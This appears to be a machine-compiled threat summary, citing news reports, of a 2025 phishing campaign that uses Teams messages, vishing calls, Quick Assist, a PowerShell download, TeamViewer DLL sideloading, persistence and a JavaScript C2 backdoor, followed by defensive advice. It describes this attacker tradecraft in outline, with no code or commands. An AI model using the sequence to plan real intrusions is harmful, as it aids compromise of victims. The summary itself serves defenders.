Introduction
A sophisticated multi-stage phishing attack has been identified [1] [5], utilizing advanced techniques such as vishing, remote access tools [1] [2] [3] [5] [6] [7], and DLL sideloading [1] [3] [5]. This threat exploits platforms like Microsoft Teams and Quick Assist, beginning with a phishing message that includes a malicious PowerShell payload [7], ultimately deploying a JavaScript-based command-and-control (C2) backdoor on victim devices [1] [5].
Description
A sophisticated multi-stage phishing attack has been identified [1] [5], leveraging vishing [4], remote access tools [1] [2] [3] [5] [6] [7], and DLL sideloading techniques [1] [5]. This evolving threat exploits Microsoft Teams and Quick Assist [1] [5], beginning with a phishing message that includes a malicious PowerShell payload [7], ultimately deploying a JavaScript-based command-and-control (C2) backdoor on victim devices [1] [5].
The attack commences with a vishing scheme initiated through a Microsoft Teams message from a seemingly legitimate external user, which contains a PowerShell command designed to download a payload that facilitates further attacks. This is followed by a vishing call that builds trust and persuades the target to execute the script, triggering a larger attack chain [3]. Attackers utilize living-off-the-land binaries, sideloading a malicious DLL named TV.dll into a trusted process by executing a signed binary, TeamViewer.exe [3] [4] [5] [6], strategically placed in a hidden folder to blend in with normal system activity. They establish persistence by creating a shortcut in the Start-up folder [1] [5], ensuring the malware runs automatically upon system reboot [3], and utilize Windows’ Background Intelligent Transfer Service (BITS) to discreetly transfer files and stage additional malware [6], maintaining access for up to 90 days [3].
Threat researchers have noted significant similarities between this attack and previous campaigns attributed to Storm-1811 [5], a group known for employing vishing and Quick Assist to infiltrate networks [1] [5]. The tactics used [1] [3] [5] [6], such as abusing signed binaries [1] [5], DLL sideloading [1] [3] [5], and leveraging Microsoft Teams as an entry point [3], align with the known methodologies of Storm-1811 [5]. Additionally, advanced evasion techniques [6], including process hollowing and API hooking [6], were employed to avoid detection, alongside checks for virtual machines or debugging tools [6]. The attacker also conducted system scans using Windows Management Instrumentation (WMI) to gather information about the machine and its security software [6], and utilized psexec.exe for lateral movement, stealing saved login credentials from web browsers [6].
Mitigation strategies emphasize the need for real-time scanning across all communication channels [2], as these attacks often initiate with social engineering before deploying malicious tools like sideloaded DLLs [1] [2]. Defenders are advised to monitor for unexpected use of Quick Assist, unusual execution paths for signed binaries like TeamViewer.exe [3], and signs of DLL sideloading [3]. This incident underscores the significant risks posed by social engineering and the misuse of trusted tools [3], with a reported 1633% increase in vishing attacks noted in Q1 2025. The increasing sophistication of phishing and vishing attacks [6], particularly with the use of AI-powered voice cloning in vishing schemes [1], highlights the necessity for organizations to adopt machine learning-powered tools that incorporate computer vision [6], natural language processing [2], and behavioral analysis to better recognize suspicious activities indicative of such threats.
Conclusion
The identified phishing attack highlights the growing complexity and sophistication of cyber threats, particularly those leveraging social engineering and trusted platforms. Organizations must prioritize real-time monitoring and adopt advanced machine learning tools to detect and mitigate such threats effectively. The significant rise in vishing attacks and the use of AI in these schemes underscore the urgent need for enhanced security measures to protect against evolving cyber threats.
References
[1] https://ciso2ciso.com/new-phishing-attack-combines-vishing-and-dll-sideloading-techniques-source-www-infosecurity-magazine-com/
[2] https://www.forbes.com/sites/daveywinder/2025/04/01/microsoft-teams-users-exploited-in-sophisticated-multi-stage-ai-attack/
[3] https://hackread.com/microsoft-teams-vishing-deploy-malware-via-teamviewer/
[4] https://blog.hunterstrategy.net/trending-topics-22/
[5] https://www.infosecurity-magazine.com/news/phishing-attack-combines-vishing/
[6] https://redmondmag.com/Articles/2025/04/01/Security-Firm-Reveals-Voice-Phishing-Attack-Targeting-Microsoft-Teams.aspx
[7] https://bestofai.com/article/microsoft-teams-users-exploited-in-sophisticated-multi-stage-ai-attack
